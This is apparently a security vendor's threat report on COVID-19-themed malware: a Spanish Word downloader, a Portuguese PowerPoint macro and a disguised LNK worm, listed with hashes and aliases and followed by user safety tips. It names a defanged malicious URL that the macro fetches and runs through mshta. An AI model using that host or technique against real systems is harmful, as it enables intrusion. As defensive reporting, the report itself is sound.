As health care workers battle with COVID-19 pandemic in the frontline to keep people safe, security professionals continue to combat coronavirus related malware to secure the cyber world. Government and health officials have been publishing guidelines to prevent the virus, and it comes as no surprise that hackers have been exploiting it once again. ASEC (AhnLab Security Emergency-response Center) analysts have analyzed the latest COVID-19 related malware.
AhnLab’s security experts have been continuously analyzing COVID-19 related malware. According to ASEC analysts, malware distribution began in late February. Malware, disguised as COVID-19 relevant information, were distributed through attachment files in spearphishing emails. Although the earlier malware versions were found to be a test or a mere prank, the later versions got more serious. It started to take the form of malicious threats, such as backdoor and downloader.
Malware Disguised as a COVID-19 Prevention Handbook
• File Name: Medidas Preventivas contra el COVID-19.doc
• MD5: 6862a4ed7c8e3341fed411245028b35b
• Alias: W97M/Downloader
Hackers have been disguising as COVID-19 relevant information as a way to distribute malware. In the recent attacks, a malware disguised as a COVID-19 prevention handbook has been discovered. It may seem harmless but is, in fact, malicious. The document is written in Spanish, as shown in Figure 1.
Figure 1. Malicious Document Disguised as COVID-19 Prevention Handbook
COVID-19 Related Macro Malware
• File Name: Relação de Hotéis e Hospedes - Estado afetado pelo COVID-19 (Novo Corona vírus).pps
• MD5: 90e495357a4c9a4bb1e9cab4b9664367
• Alias: Downloader/Ppt.Generic
Another type of malware have been found in a malicious PowerPoint (PPT) file. Once executed, a macro code, shown in Figure 2, will automatically run a VBS script in hxxps://omecanism2.sslblindado.com/coronavirus.mp3 through mshta. AhnLab’s anti-malware product, V3, blocks the relevant malware using the alias, Malware/Win32.RL_SpyGate.
Figure 2. Malicious Macro within COVID-19 Related Document
COVID-19 Related Worm Malware
• File Name: Covid 19.lnk
• MD5: ba3f0d0603a030fd64f5d15fc14ed34e
• Alias: LNK/Runner
The last type of malware discovered by ASEC analysts was a LNK file disguised as a folder icon. Once executed, it will run the Manuel.doc file, which is an encoded VB script. It then opens the COVID-19 folder to trick the user into believing that the LNK file is a real folder. This malware is similar to Forbix worm malware and can perform additional malicious behavior depending on the executed scripts.
To prevent damage from malware disguised as COVID-19 related information, users must follow basic security measures: ▲ Always check the email recipient before taking further actions ▲ Avoid opening files attached to emails from unknown or suspicious sources ▲ Install the latest security patch for programs such as OS, Internet browsers, application programs, and office software ▲ Keep anti-malware, such as V3, versions up to date.